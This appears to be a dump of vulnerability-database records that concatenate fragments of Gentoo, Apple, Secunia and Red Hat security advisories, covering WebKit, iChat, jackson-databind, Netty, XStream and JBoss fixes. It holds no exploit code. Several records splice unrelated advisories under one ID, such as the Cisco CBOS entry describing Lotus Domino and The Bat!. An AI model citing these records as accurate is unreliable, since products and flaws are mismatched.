] CVE-2011-3042 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3042 [ 13 ] CVE-2011-3043 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3043 [ 14 ] CVE-2011-3044 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3044 [ 15 ] CVE-2011-3046 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3046 [ 16 ] CVE-2011-3047 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3047 [ 17 ] CVE-2011-3049 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3049 [ 18 ] CVE-2011-3050 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3050 [ 19 ] CVE-2011-3051 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3051 [ 20 ] CVE-2011-3052 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3052 [ 21 ] CVE-2011-3053 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3053 [ 22 ] CVE-2011-3054 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3054 [ 23 ] CVE-2011-3055 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3055 [ 24 ] CVE-2011-3056 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3056 [ 25 ] CVE-2011-3057 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3057 [ 26 ] Release Notes 17.0.963.65 http://googlechromereleases.blogspot.com/2012/03/chrome-stable-update.htm= l [ 27 ] Release Notes 17.0.963.78 http://googlechromereleases.blogspot.com/2012/03/chrome-stable-channel-up= date.html [ 28 ] Release Notes 17.0.963.79 http://googlechromereleases.blogspot.com/2012/03/chrome-stable-update_10.= html [ 29 ] Release Notes 17.0.963.83 http://googlechromereleases.blogspot.com/2012/03/stable-channel-update_21= .html Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201203-19.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2012-05-07-1 iOS 5.1.1 Software Update iOS 5.1.1 Software Update is now available and addresses the following: Safari Available for: iPhone 3GS, iPhone 4, iPhone 4S, iPod touch (3rd generation) and later, iPad, iPad 2 Impact: A maliciously crafted website may be able to spoof the address in the location bar Description: A URL spoofing issue existed in Safari. This could be used in a malicious web site to direct the user to a spoofed site that visually appeared to be a legitimate domain. This issue is addressed through improved URL handling. This issue does not affect OS X systems. CVE-ID CVE-2012-0674 : David Vieira-Kurz of MajorSecurity (majorsecurity.net) WebKit Available for: iPhone 3GS, iPhone 4, iPhone 4S, iPod touch (3rd generation) and later, iPad, iPad 2 Impact: Visiting a maliciously crafted website may lead to a cross- site scripting attack Description: Multiple cross-site scripting issues existed in WebKit. CVE-ID CVE-2011-3046 : Sergey Glazunov working with Google's Pwnium contest CVE-2011-3056 : Sergey Glazunov WebKit Available for: iPhone 3GS, iPhone 4, iPhone 4S, iPod touch (3rd generation) and later, iPad, iPad 2 Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in WebKit. CVE-ID CVE-2012-0672 : Adam Barth and Abhishek Arya of the Google Chrome Security Team Installation note: This update is only available through iTunes, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from www.apple.com/itunes/ iTunes will automatically check Apple's update server on its weekly schedule. When an update is detected, it will download it. When the iPhone, iPod touch or iPad is docked, iTunes will present the user with the option to install the update. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iPhone, iPod touch, or iPad. The automatic update process may take up to a week depending on the day that iTunes checks for updates. You may manually obtain the update via the Check for Updates button within iTunes. After doing this, the update can be applied when your iPhone, iPod touch, or iPad is docked to your computer. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. The version after applying this update will be "5.1.1". Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.16 (Darwin) iQEcBAEBAgAGBQJPpBcyAAoJEGnF2JsdZQeexJYH/0aYO0MULFXYARidSV22JdjG a1+yXKn8Rv2vv+8yStgKK2mWu18hvYWQ+whtvCzs1OefiVsq1nOvdCL1G62ybcYv O9BiHEDsuu+On2nAPiglu+luokByKLlZcIaM1Qa3pXHkiI8jlH7y7XuuoFsVt1Vc 284JgvV/sHnvesne2GsNyoRBJjfkliqXCgb1zmQWO9xX7HEJCaMNlc5Bwdonm26q 3OEKr2UQxvmWCbnCroiQ5KmEM+gLJSfLLOymow9xa4gM8aM87BXGWNMEKVs8LRLm dHngmEmzEa/Fx9PnR7rqjTCAMS8hR7aFcCYNTWjfR+keRXx7OHhCm88MfndryS8= =qhqL -----END PGP SIGNATURE----- . CVE-ID CVE-2012-0672 : Adam Barth and Abhishek Arya of the Google Chrome Security Team WebKit Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7.4, OS X Lion Server v10.7.4, Windows 7, Vista, XP SP2 or later Impact: A maliciously crafted website may be able to populate form inputs on another website with arbitrary values Description: A state tracking issue existed in WebKit's handling of forms. CVE-ID CVE-2012-0676 : Andreas Akre Solberg of UNINETT AS, Aaron Roots of Deakin University ITSD, Tyler Goen Note: In addition, this update disables Adobe Flash Player if it is older than 10.1.102.64 by moving its files to a new directory. This update presents the option to install an updated version of Flash Player from the Adobe website
var-200702-0109 The Bonjour functionality in iChat in Apple Mac OS X 10.3.9 allows remote attackers to cause a denial of service (persistent application crash) via unspecified vectors, possibly related to CVE-2007-0614. Apple iChat is prone to multiple remote denial-of-service vulnerabilities. These issues affect the Bonjour functionality. Apple iChat 3.1.6 is reported affected; other versions may be vulnerable as well. Apple iChat is a video chat tool bundled with Apple's family of operating systems. Several denial-of-service vulnerabilities exist in iChat's Bonjour feature, which allows automatic discovery of computers. There are no restrictions on finding available contacts via mDNS queries, iChat will add the broadcasted _presence._tcp record even if the contact does not exist, so a malicious user can broadcast a fake record so that iChat users using Bonjour cannot discover more peers, unable to communicate reliably. Trying to start iChat Bonjour again will fail because mDNSResponder keeps a specially crafted record. ---------------------------------------------------------------------- To improve our services to our customers, we have made a number of additions to the Secunia Advisories and have started translating the advisories to German. The improvements will help our customers to get a better understanding of how we reached our conclusions, how it was rated, our thoughts on exploitation, attack vectors, and scenarios. The vulnerability exists due to an error in the "fpathconf()" syscall when it is called with an unsupported file type and can be exploited to cause a system panic. The vulnerability is confirmed in version 10.4.8. SOLUTION: Grant only trusted users access to affected systems. PROVIDED AND/OR DISCOVERED BY: Initially discovered in FreeBSD and reported in Mac OS X by Ilja Van Sprundel. ORIGINAL ADVISORY: http://projects.info-pull.com/mokb/MOKB-09-11-2006.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------
var-200107-0173 Cisco CBOS 2.3.0.053 sends output of the "sh nat" (aka "show nat") command to the terminal of the next user who attempts to connect to the router via telnet, which could allow that user to obtain sensitive information. The Lotus Domino Web Server contains a flaw that could be exploited to cause a denial of service. Due to a problem parsing carriage return/line feeds in RFC822 format mail messages, The Bat! mail client may permaturely detect the end of a mail message, causing an error to occur. This error may prevent the mail user from retrieving other mail messages until the message with the error is removed. Submitting numerous HTTP requests with modified headers, could cause Lotus Domino to consume all available system resources
var-202003-1778 FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef (aka caucho-quercus). FasterXML jackson-databind Exists in unspecified vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. FasterXML Jackson is a data processing tool for Java developed by American FasterXML Company. jackson-databind is one of the components with data binding function. A security vulnerability exists in FasterXML jackson-databind 2.x versions prior to 2.9.10.4 due to insecure deserialization of com.caucho.config.types.ResourceRef (caucho-quercus). A remote attacker could exploit this vulnerability with specially crafted input to execute arbitrary code on the system. Description: Red Hat Decision Manager is an open source decision management platform that combines business rules management, complex event processing, Decision Model & Notation (DMN) execution, and Business Optimizer for solving planning problems. It automates business decisions and makes that logic available to the entire business. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Important: Red Hat Data Grid 7.3.7 security update Advisory ID: RHSA-2020:3779-01 Product: Red Hat JBoss Data Grid Advisory URL: https://access.redhat.com/errata/RHSA-2020:3779 Issue date: 2020-09-17 CVE Names: CVE-2017-7658 CVE-2019-10172 CVE-2020-1695 CVE-2020-1710 CVE-2020-1719 CVE-2020-1745 CVE-2020-1748 CVE-2020-1757 CVE-2020-8840 CVE-2020-9488 CVE-2020-9546 CVE-2020-9547 CVE-2020-9548 CVE-2020-10672 CVE-2020-10673 CVE-2020-10714 CVE-2020-10968 CVE-2020-10969 CVE-2020-11111 CVE-2020-11112 CVE-2020-11113 CVE-2020-11612 CVE-2020-11619 CVE-2020-11620 ==================================================================== 1. Summary: An update for Red Hat Data Grid is now available. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Description: Red Hat Data Grid is a distributed, in-memory, NoSQL datastore based on the Infinispan project. This release of Red Hat Data Grid 7.3.7 serves as a replacement for Red Hat Data Grid 7.3.6 and includes bug fixes and enhancements, which are described in the Release Notes, linked to in the References section of this erratum. Security Fix(es): * jetty: Incorrect header handling (CVE-2017-7658) * EAP: field-name is not parsed in accordance to RFC7230 (CVE-2020-1710) * undertow: AJP File Read/Inclusion Vulnerability (CVE-2020-1745) * undertow: servletPath is normalized incorrectly leading to dangerous application mapping which could result in security bypass (CVE-2020-1757) * jackson-databind: Lacks certain xbean-reflect/JNDI blocking (CVE-2020-8840) * jackson-databind: Serialization gadgets in shaded-hikari-config (CVE-2020-9546) * jackson-databind: Serialization gadgets in ibatis-sqlmap (CVE-2020-9547) * jackson-databind: Serialization gadgets in anteros-core (CVE-2020-9548) * jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution (CVE-2020-10672) * jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution (CVE-2020-10673) * jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider (CVE-2020-10968) * jackson-databind: Serialization gadgets in javax.swing.JEditorPane (CVE-2020-10969) * jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory (CVE-2020-11111) * jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider (CVE-2020-11112) * jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime (CVE-2020-11113) * jackson-databind: Serialization gadgets in org.springframework:spring-aop (CVE-2020-11619) * jackson-databind: Serialization gadgets in commons-jelly:commons-jelly (CVE-2020-11620) * jackson-mapper-asl: XML external entity similar to CVE-2016-3720 (CVE-2019-10172) * resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class (CVE-2020-1695) * Wildfly: EJBContext principal is not popped back after invoking another EJB using a different Security Domain (CVE-2020-1719) * Wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain (CVE-2020-1748) * wildfly-elytron: session fixation when using FORM authentication (CVE-2020-10714) * netty: compression/decompression codecs don't enforce limits on buffer allocation sizes (CVE-2020-11612) * log4j: improper validation of certificate with host mismatch in SMTP appender (CVE-2020-9488) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. 3. Solution: To install this update, do the following: 1. Download the Data Grid 7.3.7 server patch from the customer portal. See the download link in the References section. 2. Back up your existing Data Grid installation. You should back up databases, configuration files, and so on. 3. Install the Data Grid 7.3.7 server patch. Refer to the 7.3 Release Notes for patching instructions. 4. Restart Data Grid to ensure the changes take effect. 4. Bugs fixed (https://bugzilla.redhat.com/): 1595621 - CVE-2017-7658 jetty: Incorrect header handling 1715075 - CVE-2019-10172 jackson-mapper-asl: XML external entity similar to CVE-2016-3720 1730462 - CVE-2020-1695 resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class 1752770 - CVE-2020-1757 undertow: servletPath is normalized incorrectly leading to dangerous application mapping which could result in security bypass 1793970 - CVE-2020-1710 EAP: field-name is not parsed in accordance to RFC7230 1796617 - CVE-2020-1719 Wildfly: EJBContext principal is not popped back after invoking another EJB using a different Security Domain 1807305 - CVE-2020-1745 undertow: AJP File Read/Inclusion Vulnerability 1807707 - CVE-2020-1748 Wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain 1815470 - CVE-2020-10673 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution 1815495 - CVE-2020-10672 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution 1816216 - CVE-2020-11612 netty: compression/decompression codecs don't enforce limits on buffer allocation sizes 1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking 1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config 1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap 1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core 1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider 1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane 1821304 - CVE-2020-11111 jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory 1821311 - CVE-2020-11112 jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider 1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime 1825714 - CVE-2020-10714 wildfly-elytron: session fixation when using FORM authentication 1826798 - CVE-2020-11620 jackson-databind: Serialization gadgets in commons-jelly:commons-jelly 1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop 1831139 - CVE-2020-9488 log4j: improper validation of certificate with host mismatch in SMTP appender 5. References: https://access.redhat.com/security/cve/CVE-2017-7658 https://access.redhat.com/security/cve/CVE-2019-10172 https://access.redhat.com/security/cve/CVE-2020-1695 https://access.redhat.com/security/cve/CVE-2020-1710 https://access.redhat.com/security/cve/CVE-2020-1719 https://access.redhat.com/security/cve/CVE-2020-1745 https://access.redhat.com/security/cve/CVE-2020-1748 https://access.redhat.com/security/cve/CVE-2020-1757 https://access.redhat.com/security/cve/CVE-2020-8840 https://access.redhat.com/security/cve/CVE-2020-9488 https://access.redhat.com/security/cve/CVE-2020-9546 https://access.redhat.com/security/cve/CVE-2020-9547 https://access.redhat.com/security/cve/CVE-2020-9548 https://access.redhat.com/security/cve/CVE-2020-10672 https://access.redhat.com/security/cve/CVE-2020-10673 https://access.redhat.com/security/cve/CVE-2020-10714 https://access.redhat.com/security/cve/CVE-2020-10968 https://access.redhat.com/security/cve/CVE-2020-10969 https://access.redhat.com/security/cve/CVE-2020-11111 https://access.redhat.com/security/cve/CVE-2020-11112 https://access.redhat.com/security/cve/CVE-2020-11113 https://access.redhat.com/security/cve/CVE-2020-11612 https://access.redhat.com/security/cve/CVE-2020-11619 https://access.redhat.com/security/cve/CVE-2020-11620 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product\xdata.grid&downloadType=securityPatches&version=7.3 https://access.redhat.com/documentation/en-us/red_hat_data_grid/7.3/html/red_hat_data_grid_7.3_release_notes/index 6. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBX2Nf/dzjgjWX9erEAQifjA/7BlSA2KK7e4RlxfRAP3Sj7xT+CRlFcOJn NVVI6DNpfZNtD/TJ4M5JFMP/yzKb+/FoaGVUexqiUxQBcrYsViZdfwfQ6PSwQgd8 5GAtC0NINGYmr0y7m6sKbAwAofnmCoEjNPjpdfLG632Err4vXDT9pGx1RNIrfS0A qaOSuf2BjZkD9A6Azroupq/ePmRnDBW4ovWF4ES415Pa5T7N4rmoyZ3UnGrbubmm GisjzhBbFyjL2wM1gMtqKlf5Qdre0XQIio4YLEnK1DaS7qLS36L04UJP9rwtB/nn aCOKZE/4Ch0gYcNlwniH4MK4Aiy/z/OGQopuhJoKFADJ3Y5lnJwCWDMjMKwWSj1G DvKG4uSIa8l2oxGQURThwxY1Jr7sbQTy2QXCVoyZj9oOKoGel+qJaGVFVnwsOpB7 MB8nPAuINZ91RR7xSBLv/AyoLnXV3dI97kOyTwEhld6THIwAUWqk+V2y7M6Onlx9 Pf+whfe0ORHzeCj/UBZh2NqcuShUpjdE9aLyYyefa2VV4t+0L4XlIfnlNuL8Ja7j wzLJlo/u8XMktoXRrBpMWZaCzcqN1+BTuQUXNZeqfNtgFmCgJVxp6tHyHni7flQq P2M8FaCyQHyQ1ggSljgZ66AEdiwatYpqOxR4yUyrKmsXt9iPsX45TdA9zSKmF2Sb PyKX8lLP6w8=n+2X -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Solution: Before applying this update, ensure all previously released errata relevant to your system have been applied. For details about how to apply this update, see: https://access.redhat.com/articles/11258 5. JIRA issues fixed (https://issues.jboss.org/): JBEAP-18793 - [GSS](7.3.z) Upgrade Hibernate ORM from 5.3.16 to 5.3.17 JBEAP-19095 - [GSS](7.3.z) Upgrade wildfly-http-client from 1.0.20 to 1.0.21 JBEAP-19134 - (7.3.z) Upgrade HAL from 3.2.8.Final-redhat-00001 to 3.2.9.Final JBEAP-19185 - (7.3.z) Upgrade IronJacamar from 1.4.20.Final to 1.4.22.Final JBEAP-19203 - (7.3.z) WFCORE-4850 - Updating mockserver to 5.9.0. Exclusion of dependency from xom.io7m JBEAP-19205 - (7.3.z) Upgrade WildFly Core from 10.1.5.Final-redhat-00001 to 10.1.x JBEAP-19269 - [GSS](7.3.z) Upgrade jboss-logmanager from 2.1.14.Final to 2.1.15.Final JBEAP-19322 - (7.3.z) Upgrade XNIO from 3.7.7 to 3.7.8.SP1 JBEAP-19325 - (7.3.z) Upgrade Infinispan from 9.4.18.Final-redhat-00001 to 9.4.19.Final-redhat-00001 JBEAP-19397 - (7.3.z) Upgrade JSF based on Mojarra 2.3.9.SP09-redhat-00001 to 2.3.9.SP11-redhat-00001 JBEAP-19410 - Tracker bug for the EAP 7.3.2 release for RHEL-7 JBEAP-19411 - Tracker bug for the EAP 7.3.2 release for RHEL-8 JBEAP-19529 - (7.3.z) Update PR template to include PR-processor hints. JBEAP-19564 - [GSS](7.3.z) Upgrade jboss-ejb-client from 4.0.31.Final-redhat-00001 to 4.0.33.Final-redhat-00001 JBEAP-19585 - [GSS](7.3.z) Upgrade org.jboss.genericjms from 2.0.4 to 2.0.6 JBEAP-19617 - (7.3.z) Upgrade wildfly-naming-client from 1.0.12.Final-redhat-00001 to 1.0.13.Final-redhat-00001 JBEAP-19619 - (7.3.z) Upgrade JBoss JSF API from 3.0.0.SP02-redhat-00001 to 3.0.0.SP04-redhat-00001 JBEAP-19673 - (7.3.z) [WFCORE] Upgrade WildFly Common to 1.5.2.Final JBEAP-19674 - (7.3.z) [WFCORE] Upgrade galleon and wildfly-galleon-plugins from 4.1.2.Final to 4.2.4.Final JBEAP-19874 - [GSS](7.3.z) Upgrade wildfly-http-client from 1.0.21.Final-redhat-00001 to 1.0.22.Final-redhat-00001 7. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 8. The JBoss server process must be restarted for the update to take effect
var-202103-1564 Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec `and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1 this may result in request smuggling. In a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is a HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. For an example attack refer to the linked GitHub Advisory. Users are only affected if all of this is true: `HTTP2MultiplexCodec` or `Http2FrameCodec` is used, `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects, and these HTTP/1.1 objects are forwarded to another remote peer. This has been patched in 4.1.60.Final As a workaround, the user can do the validation by themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`. The References section of this erratum contains a download link (you must log in to download the update). The JBoss server process must be restarted for the update to take effect. Solution: Before applying this update, ensure all previously released errata relevant to your system have been applied. For details about how to apply this update, see: https://access.redhat.com/articles/11258 5. JIRA issues fixed (https://issues.jboss.org/): JBEAP-20478 - (7.3.z) Upgrade artemis-wildfly-integration from 1.0.2 to 1.0.4 JBEAP-20868 - Tracker bug for the EAP 7.3.7 release for RHEL-6 JBEAP-20927 - [GSS](7.3.z) Upgrade weld from 3.1.4.Final to 3.1.6.Final and weld-api to 3.1.0.SP3 JBEAP-20935 - [GSS](7.3.z) Upgrade generic jms from 2.0.8.Final-redhat-00001 to 2.0.9.Final-redhat-00001 JBEAP-20940 - (7.3.z) Upgrade WildFly Elytron from 1.10.11.Final-redhat-00001 to 1.10.12.Final-redhat-00001 JBEAP-21093 - [GSS] (7.3.z) Upgrade undertow from 2.0.34.SP1-redhat-00001 to 2.0.35.SP1-redhat-00001 JBEAP-21094 - (7.3.z) Upgrade WildFly Core from 10.1.18.Final-redhat-00001 to 10.1.19.Final-redhat-00001 JBEAP-21095 - [GSS](7.3.z) Upgrade HAL from 3.2.13.Final-redhat-00001 to 3.2.14.Final-redhat-00001 JBEAP-21096 - (7.3.z) (Core) Upgrade xalan from 2.7.1.jbossorg-2 to 2.7.1.jbossorg-5 JBEAP-21121 - (7.3.z) Upgrade wildfly-http-client from 1.0.25.Final-redhat-00001 to 1.0.26.Final-redhat-00001 JBEAP-21185 - [GSS](7.3.z) ISPN-12807 - Simple cache does not update eviction statistics JBEAP-21186 - [GSS](7.3.z) Upgrade Infinispan from 9.4.19.Final-redhat-00001 to 9.4.22.Final-redhat-00001 JBEAP-21193 - (7.3.z) Upgrade RESTEasy from 3.11.3.Final-redhat-00001 to 3.11.4.Final-redhat-00001 JBEAP-21196 - [GSS](7.3.z) Upgrade JBoss Marshalling from 2.0.10.Final to 2.0.11.Final JBEAP-21203 - [GSS](7.3.z) Upgrade jgroups-kubernetes from 1.0.13.Final to 1.0.16.Final JBEAP-21262 - [GSS](7.3.z) Upgrade yasson from 1.0.5.redhat-00001 to 1.0.9.redhat-00001 JBEAP-21279 - (7.3.z) Upgrade xalan from 2.7.1.redhat-12 to 2.7.1.redhat-13 JBEAP-21312 - [GSS](7.3.z) Upgrade Ironjacamar from 1.4.27 to 1.4.30 JBEAP-21322 - [GSS](7.3.z) 7.3 Update 6 patch breaks samesite-cookie in Undertow JBEAP-21351 - (7.3.z) Upgrade WildFly Core from 10.1.19.Final-redhat-00001 to 10.1.20.Final-redhat-00001 JBEAP-21390 - (7.3.z) Upgrade Bouncy Castle from 1.68.0.redhat-00001 to 1.68.0.redhat-00005 JBEAP-21479 - (7.3.z) Upgrade mod_cluster from 1.4.3.Final-redhat-00001 to 1.4.3.Final-redhat-00002 7. Description: Red Hat Single Sign-On 7.4 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications. Description: AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms. Summary: This advisory resolves CVE issues filed against XP2 releases that have been fixed in the underlying EAP 7.3.x base. There are no changes to the EAP XP2 code base. NOTE: This advisory is informational only. There are no code changes associated with it. No action is required. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Description: These are CVE issues filed against XP2 releases that have been fixed in the underlying EAP 7.3.x base, so no changes to the EAP XP2 code base. Solution: This advisory is informational only. There are no code changes associated with it. No action is required. Bugs fixed (https://bugzilla.redhat.com/): 1912881 - CVE-2020-28052 bouncycastle: password bypass in OpenBSDBCrypt.checkPassword utility possible 1923133 - CVE-2021-20220 undertow: Possible regression in fix for CVE-2020-10687 1927028 - CVE-2021-21290 netty: Information disclosure via the local system temporary directory 1929479 - CVE-2021-20250 wildfly: Information disclosure due to publicly accessible privileged actions in JBoss EJB Client 1937364 - CVE-2021-21295 netty: possible request smuggling in HTTP/2 due missing validation 1937440 - CVE-2020-13936 velocity: arbitrary code execution when attacker is able to modify templates 1944888 - CVE-2021-21409 netty: Request smuggling via content-length header 1948001 - CVE-2021-3536 wildfly: XSS via admin console when creating roles in domain mode 1962879 - CVE-2020-15522 bouncycastle: Timing issue within the EC math library 5. JIRA issues fixed (https://issues.jboss.org/): JBEAP-22122 - XP 2.0.0 respin (2.0.0-7.3.8.GA) 6. The purpose of this text-only errata is to inform you about the security issues fixed in this release. Bugs fixed (https://bugzilla.redhat.com/): 1739497 - CVE-2019-10744 nodejs-lodash: prototype pollution in defaultsDeep function leading to modifying properties 1802531 - CVE-2019-12415 poi: a specially crafted Microsoft Excel document allows attacker to read files from the local filesystem 1831139 - CVE-2020-9488 log4j: improper validation of certificate with host mismatch in SMTP appender 1851014 - CVE-2020-2934 mysql-connector-java: allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors which could result in unauthorized update, insert or delete 1851019 - CVE-2020-2875 mysql-connector-java: allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors which could result in unauthorized update, insert or delete 1887648 - CVE-2020-13943 tomcat: Apache Tomcat HTTP/2 Request mix-up 1898907 - CVE-2020-26217 XStream: remote code execution due to insecure XML deserialization when relying on blocklists 1901304 - CVE-2020-27782 undertow: special character in query results in server errors 1902826 - CVE-2020-27218 jetty: buffer not correctly recycled in Gzip Request inflation 1904221 - CVE-2020-17527 tomcat: HTTP/2 request header mix-up 1905796 - CVE-2020-35510 jboss-remoting: Threads hold up forever in the EJB server by suppressing the ack from an EJB client 1908837 - CVE-2020-26259 XStream: arbitrary file deletion on the local host when unmarshalling 1922102 - CVE-2021-23926 xmlbeans: allowed malicious XML input may lead to XML Entity Expansion attack 1922123 - CVE-2020-17521 groovy: OS temporary directory leads to information disclosure 1923405 - CVE-2021-20218 fabric8-kubernetes-client: vulnerable to a path traversal leading to integrity and availability compromise 1927028 - CVE-2021-21290 netty: Information disclosure via the local system temporary directory 1928172 - CVE-2020-13949 libthrift: potential DoS when processing untrusted payloads 1930423 - CVE-2020-28491 jackson-dataformat-cbor: Unchecked allocation of byte buffer can cause a java.lang.OutOfMemoryError exception 1933808 - CVE-2020-11987 batik: SSRF due to improper input validation by the NodePickerPanel 1933816 - CVE-2020-11988 xmlgraphics-commons: SSRF due to improper input validation by the XMPParser 1934116 - CVE-2020-27223 jetty: request containing multiple Accept headers with a large number of "quality" parameters may lead to DoS 1937364 - CVE-2021-21295 netty: possible request smuggling in HTTP/2 due missing validation 1939839 - CVE-2021-27568 json-smart: uncaught exception may lead to crash or information disclosure 1942539 - CVE-2021-21341 XStream: allow a remote attacker to cause DoS only by manipulating the processed input stream 1942545 - CVE-2021-21342 XStream: SSRF via crafted input stream 1942550 - CVE-2021-21343 XStream: arbitrary file deletion on the local host via crafted input stream 1942554 - CVE-2021-21344 XStream: Unsafe deserizaliation of javax.sql.rowset.BaseRowSet 1942558 - CVE-2021-21345 XStream: Unsafe deserizaliation of com.sun.corba.se.impl.activation.ServerTableEntry 1942578 - CVE-2021-21346 XStream: Unsafe deserizaliation of sun.swing.SwingLazyValue 1942629 - CVE-2021-21347 XStream: Unsafe deserizaliation of com.sun.tools.javac.processing.JavacProcessingEnvironment NameProcessIterator 1942633 - CVE-2021-21348 XStream: ReDoS vulnerability 1942635 - CVE-2021-21349 XStream: SSRF can be activated unmarshalling with XStream to access data streams from an arbitrary URL referencing a resource in an intranet or the local host 1942637 - CVE-2021-21350 XStream: Unsafe deserizaliation of com.sun.org.apache.bcel.internal.util.ClassLoader 1942642 - CVE-2021-21351 XStream: allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream 1944888 - CVE-2021-21409 netty: Request smuggling via 